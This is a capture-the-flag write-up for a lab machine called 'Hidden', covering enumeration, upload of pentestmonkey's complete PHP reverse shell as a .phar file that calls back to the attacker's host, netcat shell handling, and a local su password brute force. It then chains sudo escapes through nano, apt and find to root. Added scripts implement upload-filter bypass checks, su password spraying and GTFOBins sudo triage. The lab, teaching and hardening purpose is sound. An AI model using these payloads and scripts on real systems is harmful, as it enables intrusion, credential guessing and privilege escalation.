HIDDEN MACHINE
┌──(root㉿kali)-[/home/kali]
└─# bash auto_deploy.sh hidden.tar
Deploying the vulnerable machine, please wait a moment.
Machine deployed, its IP address is --> 172.17.0.2
Press Ctrl+C when you are done with the machine to remove it
Once the host was identified, we scanned it with Nmap across all 65535 TCP ports (-p- with --min-rate 5000 for speed, -sV for version detection, -n -Pn to skip DNS and host discovery). Only port 80 (HTTP) was open, running Apache httpd 2.4.52.
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -sV -vvv 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 11:59 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 11:59
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:59, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:59
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:59, 0.64s elapsed (65535 total ports)
Initiating Service scan at 11:59
Scanning 1 service on 172.17.0.2
Completed Service scan at 11:59, 6.02s elapsed (1 service on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:59
Completed NSE at 11:59, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:59
Completed NSE at 11:59, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-12-13 11:59:25 CET for 7s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: localhost
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.17 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Next, we map the hostname hidden.lab to the target in /etc/hosts so that name-based requests reach the right virtual host.
┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hidden.lab
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Now we run gobuster against the website to enumerate directories and files, as shown below.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://hidden.lab/" -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -x txt,php,pdf,bak,xml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://hidden.lab/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: xml,txt,php,pdf,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/mail (Status: 301) [Size: 307] [--> http://hidden.lab/mail/]
/lib (Status: 301) [Size: 306] [--> http://hidden.lab/lib/]
/css (Status: 301) [Size: 306] [--> http://hidden.lab/css/]
Progress: 1226591 / 49772730 (2.46%)^C
We also add the dev.hidden.lab virtual host to /etc/hosts, pointing at the same IP, so we can enumerate it separately.
┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hidden.lab
172.17.0.2 dev.hidden.lab
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
┌──(root㉿kali)-[/home/kali]
└─# ls
Descargas Escritorio Imágenes Plantillas reverse.phar
Documentos hidden.txt Música Público Vídeos
Next we prepare a PHP reverse shell: pentestmonkey's php-reverse-shell, with $ip and $port pointed at our Kali host (192.168.88.5:4444), saved as reverse.phar. On Debian/Ubuntu, Apache's PHP module is configured to execute files ending in .php, .phar or .phtml (the FilesMatch rule in php*.conf), so a .phar upload is still executed as PHP when requested, even where an upload filter rejects .php.
┌──(root㉿kali)-[/home/kali]
└─# cat reverse.phar
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.88.5'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
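Why the .phar extension works, as an added example that is not part of the original writeup or of pentestmonkey's script: on Debian and Ubuntu the mod_php configuration (/etc/apache2/mods-available/php*.conf) routes files matching `.+\.ph(ar|p|tml)$` to the PHP engine, so an upload filter that only rejects `.php` is bypassed by `.phar` or `.phtml`. The blocklist function below is a hypothetical stand-in for whatever upload.php checks (its source is not shown on the page); the hardened check shows the allowlist form a developer should use instead.

```shell
#!/bin/sh
# Added example: which filenames slip past a naive upload filter yet still
# get executed by Apache's PHP module on Debian/Ubuntu. Not the page's code.

# Mirrors the FilesMatch rule shipped in Debian/Ubuntu's php*.conf:
#   <FilesMatch ".+\.ph(ar|p|tml)$">  ->  handled by the PHP engine.
# The regex is case-sensitive, so "x.PHP" is NOT executed by this rule.
php_handled() {
    printf '%s\n' "$1" | grep -Eq '.+\.ph(ar|p|tml)$'
}

# Hypothetical stand-in for the check in upload.php (its source is not on the
# page): rejects only a literal ".php" suffix. Returns 0 when the upload is allowed.
naive_blocklist_allows() {
    case "$1" in
        *.php) return 1 ;;
        *)     return 0 ;;
    esac
}

# Print every candidate name that the naive filter accepts AND Apache executes.
bypass_candidates() {
    for name in "$@"; do
        if naive_blocklist_allows "$name" && php_handled "$name"; then
            printf '%s\n' "$name"
        fi
    done
}

# Hardened check: allowlist of the final extension, compared case-insensitively.
# Pair this with "php_admin_flag engine off" (or RemoveHandler) on the uploads
# directory and a server-generated filename, so uploaded content is never executed.
hardened_allows() {
    ext=${1##*.}
    [ "$ext" != "$1" ] || return 1          # no extension at all
    ext=$(printf '%s' "$ext" | tr 'A-Z' 'a-z')
    case "$ext" in
        jpg|jpeg|png|gif) return 0 ;;
        *)                return 1 ;;
    esac
}

# Demo: run with --demo to list bypasses for a few constructed candidate names.
if [ "${1:-}" = "--demo" ]; then
    bypass_candidates reverse.php reverse.phar reverse.phtml reverse.PHP reverse.php.jpg
fi
```

Running it with --demo prints reverse.phar and reverse.phtml: both pass the blocklist and both are executed by the default handler rule, which is exactly the gap this box relies on. Note that reverse.PHP and reverse.php.jpg are not executed under the stock rule; those tricks only work against configurations that map PHP by a case-insensitive or non-anchored pattern.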
Now we run gobuster against the dev virtual host. This time it turns up an upload form (upload.php) and an uploads directory; /server-status returning 403 is the default Apache behaviour and not interesting.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://dev.hidden.lab/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x txt,php,pdf,bak,xml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dev.hidden.lab/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: pdf,bak,xml,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 318] [--> http://dev.hidden.lab/uploads/]
/upload.php (Status: 200) [Size: 74]
/server-status (Status: 403) [Size: 279]
Progress: 1323342 / 1323342 (100.00%)
===============================================================
Finished
===============================================================
We upload reverse.phar through upload.php, start a netcat listener on port 4444 first, and then request the uploaded file under /uploads/ on dev.hidden.lab. Apache executes it as PHP and the shell connects back to us as www-data. From there we upgrade the dumb shell to a proper TTY with script, then stty raw -echo and fg.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.88.5] from hidden.lab [172.17.0.2] 52186
Linux 943f6acd83a3 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
11:22:46 up 38 min, 0 users, load average: 6.25, 3.75, 2.30
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@943f6acd83a3:/$ ^Z
zsh: suspended nc -lvp 4444
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
[1] + continued nc -lvp 4444
reset xterm
www-data@943f6acd83a3:/$ export TERM=xterm
www-data@943f6acd83a3:/$ export SHELL=BASH
Now let's look at how to escalate from www-data to root. First, the SUID binaries and the home directories.
www-data@943f6acd83a3:/$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/sudo
www-data@943f6acd83a3:/$ cd /home/
www-data@943f6acd83a3:/home$ ls
bobby cafetero john
www-data@943f6acd83a3:/home$ cd bobby/
bash: cd: bobby/: Permission denied
www-data@943f6acd83a3:/home$ cd cafetero/
bash: cd: cafetero/: Permission denied
www-data@943f6acd83a3:/home$ cd john/
bash: cd: john/: Permission denied
www-data@943f6acd83a3:/home$
The home directories are not readable by www-data and the SUID list is the stock set, so we turn to the local users themselves. If any of bobby, cafetero or john uses a weak password, a local su brute force will find it. We use the bruteforce.sh script from the Sudo_BruteForce toolkit, dropped into the writable uploads directory through the same upload form.
www-data@943f6acd83a3:/home$ ls
bobby cafetero john
www-data@943f6acd83a3:/home$ cd ..
www-data@943f6acd83a3:/$ ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
www-data@943f6acd83a3:/$ cd /etc/
www-data@943f6acd83a3:/etc$ ls
adduser.conf host.conf nanorc security
alternatives hostname netconfig selinux
apache2 hosts networks services
apt init.d nsswitch.conf shadow
bash.bashrc issue opt shadow-
bindresvport.blacklist issue.net os-release shells
ca-certificates kernel pam.conf skel
ca-certificates.conf ld.so.cache pam.d ssl
cloud ld.so.conf passwd subgid
cron.d ld.so.conf.d passwd- subgid-
cron.daily ldap perl subuid
debconf.conf legal php subuid-
debian_version libaudit.conf profile sudo.conf
default localtime profile.d sudo_logsrvd.conf
deluser.conf logcheck protocols sudoers
dpkg login.defs rc0.d sudoers.d
e2scrub.conf logrotate.d rc1.d sysctl.conf
environment lsb-release rc2.d sysctl.d
ethertypes machine-id rc3.d systemd
fstab magic rc4.d terminfo
gai.conf magic.mime rc5.d timezone
group mailcap rc6.d ucf.conf
group- mailcap.order rcS.d ufw
gshadow mime.types resolv.conf update-motd.d
gshadow- mke2fs.conf rmt xattr.conf
gss mtab rpc
www-data@943f6acd83a3:/etc$ cd /dev/
www-data@943f6acd83a3:/dev$ ls
core full null pts shm stdin tty zero
fd mqueue ptmx random stderr stdout urandom
www-data@943f6acd83a3:/dev$ cd ..
www-data@943f6acd83a3:/$ ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
www-data@943f6acd83a3:/$ cd /var/www/dev.hidden.lab/
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ ls
index.html upload.php uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ cd upload
bash: cd: upload: No such file or directory
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ ls
index.html upload.php uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ cd uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls
bruteforce.sh reverse.phar
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls -la
total 24
drwxrwxrwx 1 root root 4096 Dec 13 11:32 .
drwxr-xr-x 1 root root 4096 Apr 16 2024 ..
-rw-r--r-- 1 www-data www-data 1600 Dec 13 11:32 bruteforce.sh
-rw-r--r-- 1 www-data www-data 5493 Dec 13 11:18 reverse.phar
Now we make the script executable and run it. The uploads directory also holds the wordlist it uses (10k-most-common.txt).
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ chmod +x bruteforce.sh
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls
10k-most-common.txt bruteforce.sh prpe reverse.phar
The script finds a password: cafetero uses 123123. With su cafetero and that password we switch user, then start bash (the writeup uses bash -p) to get a proper prompt.
Password found for user cafetero: 123123
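The brute-force script itself is not shown on the page. The following is an added example of the same technique in POSIX sh, not the Sudo_BruteForce tool's code: it tries each candidate from a wordlist against su for one or more local users. Feeding the password to su on stdin works with util-linux su (Debian/Ubuntu) because its PAM prompt reads from stdin; older shadow-utils su refuses to run without a terminal. The wordlist path and the user names are assumptions. In a real run every failed attempt costs the PAM failure delay (a couple of seconds) and writes an authentication failure to the system log, so this is slow and noisy and should be a last resort.

```shell
#!/bin/sh
# Added example: local su password spraying from a low-privileged shell.
# Not the page's bruteforce.sh; same idea, written for POSIX sh.

# Try one user/password pair. Returns 0 on success, non-zero otherwise.
# Feeding the password on stdin works with util-linux su (its PAM conversation
# reads from stdin). "timeout" bounds the PAM failure delay; adjust if missing.
try_login() {
    id "$1" >/dev/null 2>&1 || return 1           # unknown user: skip quickly
    printf '%s\n' "$2" | timeout 10 su "$1" -c 'exit 0' >/dev/null 2>&1
}

# Walk a wordlist for one user; print the password and return 0 on the first hit.
brute_force() {
    bf_user=$1
    bf_list=$2
    while IFS= read -r cand || [ -n "$cand" ]; do
        [ -n "$cand" ] || continue                # skip blank lines
        if try_login "$bf_user" "$cand"; then
            printf '%s\n' "$cand"
            return 0
        fi
    done < "$bf_list"
    return 1
}

# Spray one wordlist over several users; return 0 if at least one password was found.
brute_force_users() {
    bf_wordlist=$1
    shift
    bf_found=1
    for bf_u in "$@"; do
        if bf_pw=$(brute_force "$bf_u" "$bf_wordlist"); then
            printf 'Password found for user %s: %s\n' "$bf_u" "$bf_pw"
            bf_found=0
        fi
    done
    return $bf_found
}

# Usage (assumed wordlist path and user names):
#   sh brute.sh 10k-most-common.txt bobby cafetero john
if [ "$#" -ge 2 ]; then
    brute_force_users "$@"
fi
```

Because try_login is a separate function, the spraying logic can be exercised without su at all (swap in a fake try_login), and the same loop can be pointed at another local authenticator, such as sudo -S, by changing only that one function.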
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ su cafetero
Password:
$ whoami
cafetero
$ bash -p
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -l
Matching Defaults entries for cafetero on 943f6acd83a3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User cafetero may run the following commands on 943f6acd83a3:
(john) NOPASSWD: /usr/bin/nano
cafetero can run nano as john without a password. GTFOBins' sudo entry for nano applies: open nano as john, press Ctrl+R and then Ctrl+X to reach the "Command to execute" prompt, and run reset; sh 1>&0 2>&0 to get a shell as john.
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -u "john" /usr/bin/nano
(inside nano: Ctrl+R, then Ctrl+X)
Command to execute: reset; sh 1>&0 2>&0
$ whoami
john
$ bash -p
john can in turn run apt as bobby through sudo (the command below goes through). GTFOBins' apt entry: apt changelog apt shows the package changelog in a pager, and typing !/bin/bash at the pager prompt spawns a shell as bobby.
john@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -u "bobby" /usr/bin/apt changelog apt
apt (2.4.12) jammy; urgency=medium
* Restore ?garbage by calling MarkAndSweep before parsing (LP: #1995790)
* For phasing, check if current version is a security update, not just previous ones (LP: #2051181)
-- Julian Andres Klode <juliank@ubuntu.com> Tue, 13 Feb 2024 16:39:04 +0100
apt (2.4.11) jammy; urgency=medium
* Backport archive snapshot integration as of 2.7.3 (LP: #2038453)
-- Julian Andres Klode <juliank@ubuntu.com> Fri, 06 Oct 2023 10:53:53 +0200
apt (2.4.10) jammy; urgency=medium
* dist-upgrade: Revert phased updates using keeps only (LP: #2025462)
* Do not mark updates for install that are still phasing (same bug)
* Compare SHA256 to check if versions are really the same (Closes: #931175)
(LP: #2029268)
-- Julian Andres Klode <juliank@ubuntu.com> Wed, 02 Aug 2023 15:15:58 +0200
!/bin/bash
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ whoami
bobby
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -l
Matching Defaults entries for bobby on 943f6acd83a3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User bobby may run the following commands on 943f6acd83a3:
(root) NOPASSWD: /usr/bin/find
bobby can run find as root without a password. GTFOBins' find entry uses -exec to spawn a shell; -quit stops find after the first match so we get one shell rather than one per file.
sudo -u "root" /usr/bin/find . -exec /bin/sh \; -quit
# whoami
root
# bash -p
root@943f6acd83a3:/var/www/dev.hidden.lab/uploads#
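The three sudo entries chained above (nano as john, apt as bobby, find as root) are all standard GTFOBins cases, and the triage was done by hand three times. As an added example, not part of the original writeup, the script below parses sudo -l output and annotates each entry with the matching GTFOBins shell escape, so the next hop is visible in one command. Its sample input is constructed from the page's own entries; the (bobby) /usr/bin/apt line is an assumption, since john's sudo -l is not shown, and the hint table is a small subset of GTFOBins.

```shell
#!/bin/sh
# Added example: turn "sudo -l" output into a list of (runas, tag, command)
# with the matching GTFOBins escape. Not code from the original writeup.

# Constructed sample, built from the entries seen on this box. The apt line
# for bobby is assumed: john's own "sudo -l" is not shown on the page.
SAMPLE_SUDO_L='Matching Defaults entries for cafetero on 943f6acd83a3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/bin, use_pty

User cafetero may run the following commands on 943f6acd83a3:
    (john) NOPASSWD: /usr/bin/nano
    (bobby) /usr/bin/apt
    (root) NOPASSWD: /usr/bin/find'

# Small subset of GTFOBins "sudo" entries; extend as needed.
gtfobins_hint() {
    case "$1" in
        nano)             printf '%s' 'Ctrl-R Ctrl-X, then: reset; sh 1>&0 2>&0' ;;
        apt|apt-get)      printf '%s' 'apt changelog apt, then at the pager: !/bin/sh' ;;
        find)             printf '%s' 'find . -exec /bin/sh \; -quit' ;;
        vim|vi)           printf '%s' ':!/bin/sh' ;;
        less|more|man)    printf '%s' '!/bin/sh' ;;
        awk|gawk|mawk)    printf '%s' "awk 'BEGIN {system(\"/bin/sh\")}'" ;;
        env|bash|sh|dash) printf '%s' 'runs a shell directly' ;;
        *)                printf '%s' 'not in this table; check gtfobins.github.io' ;;
    esac
}

# Read "sudo -l" output on stdin. For each "(runas) [NOPASSWD:] cmd[, cmd...]"
# line, print:  runas tag command -> hint
triage_sudo_l() {
    sed -n -E 's/^[[:space:]]*\(([^)]+)\)[[:space:]]*((NOPASSWD|PASSWD):)?[[:space:]]*(.*)$/\1|\3|\4/p' |
    while IFS='|' read -r runas tag cmds; do
        tag=${tag:-PASSWD}                       # no tag means a password is required
        printf '%s\n' "$cmds" | tr ',' '\n' | while read -r cmd _args; do
            [ -n "$cmd" ] || continue
            printf '%s %s %s -> %s\n' "$runas" "$tag" "$cmd" "$(gtfobins_hint "${cmd##*/}")"
        done
    done
}

# Usage on a target:            sudo -l | sh triage.sh
# Demo on the constructed sample: sh triage.sh --demo
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_SUDO_L" | triage_sudo_l
fi
```

The runas field is what matters for planning the chain: an entry that runs as another unprivileged user (john, bobby) is a lateral hop, and only the (root) entry ends the chain, which is why this box needed three escapes instead of one.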
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes only.
Good Hack